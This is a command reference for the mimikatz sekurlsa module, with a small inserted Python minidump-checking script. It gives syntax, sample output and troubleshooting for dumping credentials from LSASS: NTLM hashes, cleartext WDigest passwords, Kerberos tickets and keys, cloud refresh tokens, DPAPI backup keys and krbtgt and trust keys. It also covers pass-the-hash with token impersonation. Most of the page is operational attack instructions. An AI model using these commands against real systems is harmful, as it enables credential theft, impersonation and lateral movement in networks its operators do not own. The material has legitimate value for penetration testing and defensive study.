Sekurlsa module command reference
The sekurlsa module gathers credential material from a live LSASS process or an offline minidump by loading provider-specific parsers. Its command table exposes providers such as MSV, WDigest, Kerberos, CloudAP, TSPKG, SSP, DPAPI, and Credential Manager, as well as helper utilities for pass-the-hash, boot key management, and Kerberos ticket extraction.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L8-L154】
Before running provider commands, ensure the module is pointed at the correct data source:
sekurlsa::process reinitializes the module so future commands read live LSASS memory.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L112-L116】
sekurlsa::minidump <path> switches to an offline LSASS dump that you can analyze without touching the live process.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L119-L130】
Common acquisition failures affect every command. Watch for messages such as LSASS process not found (?), architecture mismatches, or missing SystemInfoStream, and resolve them by running with administrative rights, matching your build/architecture, and supplying a complete minidump.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L156-L220】
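The two dump-related failures above (a missing SystemInfoStream and an architecture mismatch) can be checked before a dump is handed to any analysis tool. The following is an added example, not code from mimikatz or from this page: it reads the header, stream directory and system-info fields as laid out in Microsoft's public MINIDUMP_HEADER, MINIDUMP_DIRECTORY and MINIDUMP_SYSTEM_INFO structures. The function names are hypothetical and the sample dump is constructed in-line.

```python
import struct

MDMP_SIGNATURE = 0x504D444D   # b"MDMP" read as a little-endian u32
SYSTEM_INFO_STREAM = 7        # MINIDUMP_STREAM_TYPE SystemInfoStream
ARCHITECTURES = {0: "x86", 5: "ARM", 9: "x64", 12: "ARM64"}

def triage_minidump(data: bytes) -> dict:
    """Walk the stream directory; report SystemInfoStream presence and CPU type."""
    if len(data) < 32:
        raise ValueError("too short for a MINIDUMP_HEADER")
    signature, _version, count, dir_rva = struct.unpack_from("<IIII", data, 0)
    if signature != MDMP_SIGNATURE:
        raise ValueError("not a minidump (bad signature)")
    report = {"streams": [], "has_system_info": False,
              "architecture": None, "build": None}
    for i in range(count):
        entry = dir_rva + 12 * i                 # MINIDUMP_DIRECTORY is 12 bytes
        if entry + 12 > len(data):
            raise ValueError("stream directory is truncated")
        stream_type, size, rva = struct.unpack_from("<III", data, entry)
        report["streams"].append(stream_type)
        if stream_type == SYSTEM_INFO_STREAM:
            if size < 20 or rva + 20 > len(data):
                raise ValueError("SystemInfoStream is truncated")
            arch, = struct.unpack_from("<H", data, rva)        # ProcessorArchitecture
            build, = struct.unpack_from("<I", data, rva + 16)  # BuildNumber
            report.update(has_system_info=True, build=build,
                          architecture=ARCHITECTURES.get(arch, f"unknown({arch})"))
    return report

def diagnose(data: bytes, analyzer_arch: str) -> str:
    """Map the report onto the two dump-related failures described above."""
    report = triage_minidump(data)
    if not report["has_system_info"]:
        return "incomplete dump: no SystemInfoStream"
    if report["architecture"] != analyzer_arch:
        return f"architecture mismatch: dump is {report['architecture']}"
    return "ok"

def build_sample(arch: int, with_system_info: bool = True) -> bytes:
    """Constructed input: header, one directory entry, 20 bytes of system info."""
    header = struct.pack("<IIIIIIQ", MDMP_SIGNATURE, 0xA793, 1, 32, 0, 0, 0)
    stream_type = SYSTEM_INFO_STREAM if with_system_info else 4  # 4 = ModuleListStream
    info = struct.pack("<HHHBBIII", arch, 6, 0, 4, 1, 10, 0, 19045)
    return header + struct.pack("<III", stream_type, len(info), 44) + info

if __name__ == "__main__":
    print(diagnose(build_sample(9), "x64"))
    print(diagnose(build_sample(0), "x64"))
    print(diagnose(build_sample(9, with_system_info=False), "x64"))
```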
Each section below summarizes syntax, use cases, sample output, and troubleshooting guidance.
sekurlsa::process
Syntax:
sekurlsa::process
Example usage/output:
mimikatz # sekurlsa::process
Switch to PROCESS
sekurlsa::minidump <path>
Syntax:
sekurlsa::minidump C:\path\to\lsass.dmp
Example usage/output:
mimikatz # sekurlsa::minidump C:\temp\lsass.dmp
Switch to MINIDUMP : 'C:\temp\lsass.dmp'
Potential errors & fixes:
<minidumpfile.dmp> argument is missing appears when no file path is supplied; rerun with a valid path.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L121-L129】
Minidump without SystemInfoStream (?) indicates an incomplete dump—re-capture it with the -ma flag in procdump or similar tools.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L188-L207】
ProcessorArchitecture ... != ...) require opening the dump with the same architecture build of mimikatz.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L195-L204】
sekurlsa::msv
Syntax:
sekurlsa::msv
Example usage/output:
mimikatz # sekurlsa::msv
Authentication Id : 0 ; 123456 (00000000:0001E240)
Package Name (NTLM only): NTLM
UserName : CONTOSO\alice
NTLM : 8846f7eaee8fb117ad06bdd830b7586c
SHA1 : 11d6b0758fddba8861c378c2ffb437e6b92245c8
Potential errors & fixes:
n.e. (KIWI_MSV1_0_CREDENTIALS KO) or kull_m_memory_copy failures imply LSASS memory changed during reading; rerun quickly or capture a minidump for a stable snapshot.【F:mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_msv1_0.c†L72-L127】
sekurlsa::wdigest
Syntax:
sekurlsa::wdigest
Example usage/output:
mimikatz # sekurlsa::wdigest
Authentication Id : 0 ; 24680 (00000000:000060A8)
UserName : CONTOSO\bob
Password : Sup3rSecret!
Potential errors & fixes:
KO, the module could not locate the WDigest session list—ensure the target build still stores credentials (Windows 8.1/2012 R2 and later disable it by default) or use sekurlsa::logonPasswords to confirm availability.【F:mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_wdigest.c†L60-L70】
sekurlsa::kerberos
Syntax:
sekurlsa::kerberos
Example usage/output:
mimikatz # sekurlsa::kerberos
Authentication Id : 0 ; 414141 (00000000:00065151)
UserName : alice
Domain : CONTOSO.COM
Password : (Kerberos keys, PIN, or smartcard data)
Potential errors & fixes:
kull_m_memory_copy during CSP or credential reads mean LSASS moved objects; retry immediately or fall back to an offline dump to avoid race conditions.【F:mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c†L391-L405】
sekurlsa::tspkg
Syntax:
sekurlsa::tspkg
Example usage/output:
mimikatz # sekurlsa::tspkg
Authentication Id : 0 ; 4011 (00000000:00000FAB)
UserName : CONTOSO\rduser
Password : TS-Delegation-Password
sekurlsa::livessp
Syntax:
sekurlsa::livessp
Example usage/output:
mimikatz # sekurlsa::livessp
Authentication Id : 0 ; 98765 (00000000:000181CD)
UserName : CONTOSO\service
Password : (LiveSSP secret)
Potential errors & fixes:
sekurlsa::logonPasswords to verify sessions.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L13-L31】
sekurlsa::cloudap
Syntax:
sekurlsa::cloudap
Example usage/output:
mimikatz # sekurlsa::cloudap
Authentication Id : 0 ; 2222 (00000000:000008AE)
UserName : alice@contoso.com
Primary Refresh Token : eyJ0eXAiOiJKV1Qi...
Device Key : {GUID}
Potential errors & fixes:
KO, the pattern search failed—confirm CloudAP is present on the target build and rerun after an interactive Azure AD login so cache structures exist. When nothing outputs, the account may not have a PRT cached yet.【F:mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.c†L24-L119】
sekurlsa::ssp
Syntax:
sekurlsa::ssp
Example usage/output:
mimikatz # sekurlsa::ssp
Authentication Id : 0 ; 1999 (00000000:000007CF)
Package : CustomSSP
UserName : CONTOSO\svc_account
Password : (decrypted secret)
Potential errors & fixes:
kull_m_memory_copy fails mid-enumeration, retry quickly or switch to an offline dump to stabilize the structures.【F:mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_ssp.c†L46-L64】
sekurlsa::logonPasswords
Syntax:
sekurlsa::logonPasswords
Example usage/output:
mimikatz # sekurlsa::logonPasswords
Authentication Id : 0 ; 123456
msv : ...
tspkg : ...
wdigest : ...
kerberos : ...
sekurlsa::bootkey
Purpose: Manage the Secure Kernel boot key cache to support isolated credential decryption.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_sk.c†L155-L210】
Syntax:
sekurlsa::bootkey /flush
sekurlsa::bootkey /new:<32-byte-hex>
sekurlsa::bootkey /raw:C:\dumps\memory.bin
Flags:
/flush — Clears cached candidate keys and resets the current IumMkPerBoot value, which you should do when a previous attempt populated the cache with stale data.【F:mimikatz/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_sk.c†L155-L161】
/new:<hex> — Injects a new 32-byte boot key (hex-encoded) and clears the cache so subsequent decryptions use the supplied value; use this when you already recovered the correct boot key from another source.【F:mimikatz/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_sk.c†L162-L170】
/raw:<path> — Scans a raw memory image or dump for additional boot key candidates, automatically appending any finds to the cache; handy when you captured RAM separately and need more key guesses.【F:mimikatz/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_sk.c†L173-L185】
Example usage/output:
mimikatz # sekurlsa::bootkey /raw:C:\dumps\ram.bin
> SecureKernel stream found in minidump (32768 bytes)
4 candidate keys found
mimikatz # sekurlsa::bootkey /flush
Potential errors & fixes: No key? indicates the tool could not read or parse key material—verify the raw file path and permissions.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_sk.c†L155-L210】 SkpEncryptionWorker(decrypt) errors mean the candidate key failed; supply a different key or re-run /raw against a higher quality memory capture.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_sk.c†L195-L210】
sekurlsa::pth
Purpose: Perform pass-the-hash/key on an existing or new logon session and optionally impersonate the resulting token.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L883-L1005】
Syntax:
sekurlsa::pth /user:<name> /domain:<fqdn> /ntlm:<hash> [/aes128:<hex>] [/aes256:<hex>] [/run:<program>] [/impersonate] [/luid:<value>]
Flags:
/luid:<value> — Target an existing logon session by LUID; use this when you know the session you want to modify and do not want to spawn a new process.【F:mimikatz/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L894-L961】
/user:<name> and /domain:<name> — Required together when you want to create a new net-only logon that will be patched; without them, the command warns about missing arguments.【F:mimikatz/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L901-L915】
/run:<program> — Overrides the default program (cmd.exe) that is launched for a new logon, letting you start a specific tool under the forged credentials.【F:mimikatz/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L905-L909】
/impersonate — After patching a net-only logon, duplicates the token and impersonates it on the current thread, which is useful for pivoting without launching a new process.【F:mimikatz/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L905-L988】
/ntlm:<hash> or /rc4:<hash> — Supplies the 16-byte NTLM hash (RC4 key) to inject; mandatory unless you provide AES keys, because at least one credential material must be replaced.【F:mimikatz/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L946-L1002】
/aes128:<hex> — Inserts a 128-bit Kerberos key. Only works on Windows 7/2008 R2 and later where AES session keys are supported; use this when targeting Kerberos authentication that relies on AES keys.【F:mimikatz/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L918-L932】
/aes256:<hex> — Inserts a 256-bit Kerberos key. Like /aes128, it is restricted to modern builds (Windows 8.1 / KB2871997 or later) and is necessary when the target service demands AES-256 tickets.【F:mimikatz/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L932-L944】
Example usage/output:
mimikatz # sekurlsa::pth /user:alice /domain:CONTOSO /ntlm:8846f7eaee8fb117ad06bdd830b7586c /run:powershell.exe
user : alice
domain : CONTOSO
program : powershell.exe
netonly : OK
Potential errors & fixes:
/user or /domain arguments trigger warnings when creating net-only logons—supply both parameters.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L901-L915】
kull_m_memory_copy failures during hash injection imply LSASS memory shifted; retry quickly or elevate privileges.【F:mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_msv1_0.c†L72-L127】
/aes128) or KB2871997/Windows 8.1+ (for /aes256); on older builds the helper skips AES injection, so rely on NTLM instead.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L918-L944】
sekurlsa::krbtgt
Syntax:
sekurlsa::krbtgt
Example usage/output:
mimikatz # sekurlsa::krbtgt
Current Key : aes256_hmac 32 b : c4d3...
Previous Key: rc4_hmac_old 16 b : 8846...
sekurlsa::dpapisystem
Syntax:
sekurlsa::dpapisystem
Example usage/output:
mimikatz # sekurlsa::dpapisystem
Machine key : 35d1e4a16a7e8e0c2932...
User key : 128b0f9ad98f8a1a47fe...
sekurlsa::trust
Syntax:
sekurlsa::trust
Example usage/output:
mimikatz # sekurlsa::trust
Domain Trust : CONTOSO.COM -> FABRIKAM.COM
Type : Cross-forest
Incoming : aes256_hmac 32 b : a1b2...
Outgoing : rc4_hmac 16 b : c3d4...
sekurlsa::backupkeys
Availability: x64/ARM64 only (same guard as trust).【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L28-L31】
Purpose: Retrieve preferred and legacy DPAPI backup keys used to decrypt DPAPI master keys.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L820-L877】
Syntax:
sekurlsa::backupkeys
sekurlsa::backupkeys /export
Flags:
/export — Passes an export flag into the analyzer so that recovered backup keys are written out, which you need when you want .pvk/.der output for later DPAPI master key recovery.【F:mimikatz/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L862-L877】
Example usage/output:
mimikatz # sekurlsa::backupkeys /export
DPAPI Backup Keys :
* Preferred : {GUID} (exported to 20240101-120000-preferred.pvk)
* Legacy : {GUID} (exported to 20240101-120000-legacy.pvk)
Potential errors & fixes: If nothing exports, ensure you supplied /export; otherwise, only in-memory details are shown.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L862-L877】 A Pattern not found in DPAPI service error means the DPAPI module offsets were not located—verify the target build is supported and rerun after switching to a matching architecture build.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L796-L837】
sekurlsa::tickets
.kirbi files.【F:mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c†L360-L465】
Syntax:
sekurlsa::tickets
sekurlsa::tickets /export
Flags:
/export — Any argument toggles the export flag (the implementation simply checks whether arguments exist), so using /export or similar causes each ticket to be saved to a file. Use it when you plan to replay tickets with other tools or need them for offline analysis.【F:mimikatz/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c†L360-L365】【F:mimikatz/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c†L451-L463】
Example usage/output:
mimikatz # sekurlsa::tickets /export
* PAC : yes
* ServiceName : krbtgt/CONTOSO.COM @ CONTOSO.COM
-> Ticket : 0 ; 0 - 0x00000000 : C:\temp\krbtgt.kirbi
Potential errors & fixes:
kull_m_file_writeData errors indicate the export directory is unwritable—change to a writable folder or run as administrator.【F:mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c†L659-L661】 If tickets do not appear, ensure the account has active Kerberos sessions.
sekurlsa::ekeys
Syntax:
sekurlsa::ekeys
Example usage/output:
mimikatz # sekurlsa::ekeys
LogonId : 0 ; 999 (00000000:000003E7)
* Key List :
> aes256_hmac (32b) : c1d2...
> rc4_hmac (16b) : e3f4...
Potential errors & fixes:
kull_m_memory_copy when reading key lists mean LSASS modified memory; retry quickly or switch to a minidump for consistent data.【F:mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c†L440-L454】
sekurlsa::dpapi
Syntax:
sekurlsa::dpapi
Example usage/output:
mimikatz # sekurlsa::dpapi
Authentication Id : 0 ; 5555 (00000000:000015B3)
MasterKey : {GUID}
Key : 4d9f...
Sha1 : 5e6a...
sekurlsa::credman
Syntax:
sekurlsa::credman
Example usage/output:
mimikatz # sekurlsa::credman
Authentication Id : 0 ; 7777 (00000000:00001E61)
Target : MicrosoftAccount:user=alice@contoso.com
User : alice@contoso.com
Password : P@ssw0rd!
Potential errors & fixes:
kull_m_memory_copy warnings point to racing LSASS memory; capture a minidump or rerun immediately.【F:mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_credman.c†L44-L89】